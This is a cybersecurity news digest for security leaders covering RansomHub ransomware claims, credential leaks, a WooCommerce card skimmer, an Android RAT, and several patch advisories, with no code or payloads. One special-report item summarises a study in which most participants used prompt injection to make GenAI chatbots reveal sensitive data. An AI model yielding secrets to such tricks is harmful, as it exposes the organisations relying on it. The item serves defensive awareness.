CISO Daily Update - June 5, 2024
NEW DEVELOPMENTS
Clevo Gaming Laptop-Maker Claimed by RansomHub Ransomware Gang
Source: Cybernews
Clevo, a prominent manufacturer of gaming laptops, was targeted by the RansomHub ransomware gang–the threat actor involved in the Change Healthcare attack. The gang claimed to steal 200GB of data from Clevo's networks with an eight-day countdown posted on their dark web leak site. RansomHub states that all of Clevo's networks and backups are encrypted with ransomware–noting no recovery capability without their decryptor. Stolen data includes manufacturing roadmaps, license agreements, schematics and other sensitive documents. RansomHub is a relatively new but aggressive player in the ransomware ecosystem. They operate on a ransomware-as-a-service model and typically avoid targets in Russia, North Korea, Cuba, and China.
361 Million Account Credentials Leaked on Telegram: Are Yours Among Them?
Source: Help Net Security?
A trove of 361 million email addresses–with 151 million previously unseen in data breaches–was leaked on Telegram and added to Have I Been Pwned? (HIBP). The data comprises over 1,700 files from thousands of Telegram channels and includes email addresses, password combinations, and URLs with login credentials. HIBP's creator, Troy Hunt, confirmed many accounts' existence and noted that compromised credentials stem from prior breaches and infostealers. Users can check if their email appears in the leak via HIBP and should secure their accounts by scanning for malware, changing passwords, enabling two-factor authentication, and reviewing account settings for unauthorized changes.
Cyberattack on Telecom Giant Frontier Claimed by RansomHub
Source: The Record
An April cyberattack on Frontier Communications was claimed by the ransomware gang RansomHub, which alleges theft of sensitive data on over 2 million people. Frontier reported the breach to the SEC and acknowledged unauthorized access to its IT systems and significant operational disruption. RansomHub is known for targeting high-profile entities and claims they accessed sensitive personal data, including social security numbers and credit scores. This gang has been active since early 2023 and is linked to attacks on Change Healthcare and Christie's.?
Kickstarter Star Leaks Over Half a Million Records With Clients’ Data
Source: Cybernews
Peak Design, a US accessories maker known for its successful Kickstarter campaigns, exposed over half a million records containing clients' private data due to a forgotten password on a publicly accessible Elasticsearch instance. The leak was discovered on March 25th and included customer email addresses, home addresses, order information, shipment tracking codes, and nearly a decade's worth of support tickets. The exposed data was accessible on search engines by April 24th, and was also targeted by a ransomware bot demanding $3940 in Bitcoin. Although the instance was eventually secured, the leak poses risks for phishing, doxxing, and exploitation by data brokers.
Christie’s Stolen Data Sold to Highest Bidder Rather Than Leaked, RansomHub Claims
Source: The Register
RansomHub's unconventional move to auction off Christie's stolen data rather than leaking it has raised eyebrows in the cybersecurity community. While auctions of stolen data occasionally occur, experts question their effectiveness and suggest that RansomHub's action may not have been a genuine attempt to sell the data. Secureworks notes that auctioning data is a last-ditch effort for cybercriminals to achieve a payout, especially when victims like Christie's refuse to pay ransom demands. The incident reinforces the human aspect of cybercrime groups and the complexities involved in their operations. Additionally, there's speculation that RansomHub may have exaggerated the scale of the theft, and the auction could be a face-saving measure.
Dessky Snippets WordPress Plugin Exploited For Card Skimming Attacks
Source: Latest Hacking News
WordPress site administrators are advised to look for potential card-skimming attacks that use the Dessky Snippets plugin. Sucuri researchers observed that attackers are utilizing this lightweight plugin (which allows for adding custom PHP code) to deploy malicious web skimmer scripts on e-commerce sites. The inserted code modifies the WooCommerce checkout process to secretly gather payment card information, which is then transmitted to a remote server. While the plugin has a small installed base, attackers appear to be more concerned with avoiding detection than with extensive distribution. To reduce risk, Sucuri recommends that WordPress users keep their sites and plugins up to date, use strong passwords, use web application firewalls, and scan for malicious code regularly.
Beware! New Android Trojan ‘Viper RAT’ on Dark Web Steals Your Data
Source: The Cyber Express
A new Android Remote Access Trojan (RAT) called Viper RAT is being promoted on dark web forums–offering features like credential grabbing, keylogging, phone unlocking, and VNC control for $499. Advertised with a dedicated website and Telegram support, Viper RAT poses a significant threat by enabling extensive access to personal data through techniques such as multi-grabbing credentials, audio and video recording, and seamless screen control. Its advanced capabilities and low barrier to entry make it a potent tool for cybercriminals.
领英推荐
Cybercrooks Get Cozy With BoxedApp to Dodge Detection
Source: The Register
Malware creators increasingly leverage legitimate commercial packer applications like BoxedApp to evade detection. BoxedApp offers features like Virtual Storage and Processes, which present challenges for anti-malware tools, as processes run in a virtualized environment–potentially bypassing detection. While antivirus solutions often flag BoxedApp-packed apps, this can lead security teams to disable related alerts and inadvertently aid attackers. Check Point Research recommends organizations limit the use of BoxedApp apps and implement controls like code signing to mitigate risks. Most malicious BoxedApp samples originate from countries like Turkey, the US, and Germany, often targeting financial and government sectors. Check Point Research provided Yara signatures to aid in the detection.
VULNERABILITIES TO WATCH
Patch Now! Google Chrome Fixes Critical Vulnerabilities
Source: The Cyber Express
Google Chrome for Desktop has patched multiple high-severity vulnerabilities identified by CERT-In Vulnerability Note (CIVN-2024-0179) that could allow attackers to execute arbitrary code on compromised PCs. The vulnerabilities affected Chrome versions prior to 125.0.6422.141/.142 for Windows and Mac and 125.0.6422.141 for Linux. These included Use after free in Media Session, Dawn & Presentation API, Out of bounds memory access in Keyboard, Out of bounds write in Streams API, and Heap buffer overflow in WebRTC. Google addressed these issues with a Stable Channel Update on May 30, 2024, containing fixes for 11 security issues. Users are advised to update their browsers to the latest version to mitigate these risks.
PoC Exploit Released for macOS Root Access Vulnerability
Source: Cyber Security News
A critical security vulnerability (CVE-2024-27822) was discovered in macOS that allowed unauthorized root access. This flaw arises from an oversight in the macOS kernel, enabling attackers to execute malicious code with root privileges. A security researcher outlined the vulnerability's exploitation via Installer[.]app and PackageKit[.]framework, emphasizing the ease with which a malicious payload can be injected into the .zshenv file and triggered during the installation of ZSH-based PKGs. With the PoC exploit code released, macOS users are urged to update their systems promptly and adhere to recommended security measures, including limiting user privileges, monitoring system activity, and maintaining regular data backups. Apple has acknowledged the issue and is working on a patch to address it.
37 Vulnerabilities Patched in Android
Source: Security Week
Google released its June 2024 security update for Android, addressing a total of 37 vulnerabilities, including several high-severity flaws in Framework and System components. The update consists of two parts: the first patch level, 2024-06-01, tackles 19 issues, primarily focusing on privilege escalation bugs. Notably, seven defects in the System component and ten in the Framework component lead to privilege escalation. The second patch level, 2024-06-05, addresses an additional 18 vulnerabilities in Kernel, Imagination Technologies, and components from Arm, MediaTek, and Qualcomm, with three Qualcomm-specific flaws marked as critical. Google also announced fixes for three vulnerabilities in the Framework and System components of Wear OS. While no Pixel or Pixel Watch security bulletins have been published yet, users are urged to update their devices promptly to mitigate any potential risks; there are no reports of these vulnerabilities being exploited in the wild.
SPECIAL REPORTS
Report Highlights How People Trick AI Chatbots Into Exposing Company Secrets
Source: Security Today
Immersive Labs' "Dark Side of GenAI" report highlights a significant security risk known as prompt injection attacks, where individuals trick chatbots into disclosing sensitive information. Analysis of their prompt injection challenge revealed that 88% of participants successfully extracted sensitive data from GenAI bots, with 17% succeeding at all challenge levels. This indicates that exploiting GenAI bots requires minimal expertise. The report urges public and private sectors to collaborate and implement robust security measures, such as data loss prevention, strict input validation, and context-aware filtering, to mitigate these risks and protect sensitive information from being compromised.
Account Takeovers Outpace Ransomware as Top Security Concern
Source: Infosecurity Magazine
According to Abnormal Security's 2024 State of Cloud Account Takeover Attacks report, account takeover attacks have surpassed ransomware as the top security concern, with 83% of organizations experiencing at least one incident in the past year. Based on responses from over 300 security professionals, the report reveals that 77% rank account takeovers among their top four threats, ahead of ransomware and spear phishing. Commonly targeted services include file storage, cloud infrastructure, and business email accounts, yet many security professionals feel unprepared to combat these attacks effectively. Despite reliance on measures like MFA and SSO, there is skepticism about their effectiveness. The report highlights a significant demand for real-time detection and automated remediation solutions, with 99% of respondents believing such tools would greatly enhance security.
Security Challenges Mount As Companies Handle Thousands of APIs
Source: Help Net Security
According to F5's 2024 State of Application Strategy Report, the rapid growth of modern applications and their associated APIs creates significant security and management challenges for enterprises. Modern apps now comprise over half of enterprise portfolios, with APIs proliferating as companies integrate AI and automate processes. Large enterprises manage thousands of APIs, leading to the widespread adoption of API gateways and automation for security. However, operational complexity, especially in hybrid multi-cloud environments, remains a major challenge. Effective management strategies, including multi-cloud networking, are crucial to address these issues and ensure app and API security.
Finding value in this newsletter? Like or share this post on LinkedIn
Head of Cyber Security/Info Sec | Chief Information Security Officer (CISO) Driving Business Resilience | CCISO, CISSP, CISM
5 个月Marcos Christodonte II, very informative, thank you